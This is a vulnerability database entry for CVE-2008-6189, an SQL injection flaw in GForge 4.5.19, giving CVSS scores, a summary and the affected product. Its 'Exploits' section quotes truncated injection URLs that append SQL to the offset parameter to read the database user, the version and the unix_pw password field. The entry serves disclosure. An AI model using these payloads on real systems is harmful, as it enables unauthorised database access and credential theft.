7.5
CVSSv2

CVE-2008-6189

Published: 19/02/2009 Updated: 17/08/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in GForge 4.5.19 allows remote malicious users to execute arbitrary SQL commands via the offset parameter to (1) new/index.php, (2) news/index.php, and (3) top/topusers.php, which is not properly handled in database-pgsql.php.

Vulnerable Product Search on Vulmon Subscribe to Product

gforge gforge 4.5.19

Exploits

Gforge <= 4519 Multiple Sql Injections Vendor Notified: 2008-10-06 Note: should work regardless magic_quotes_gpc setting gforgesitexxx/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary gforgesitexxx/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+foru ...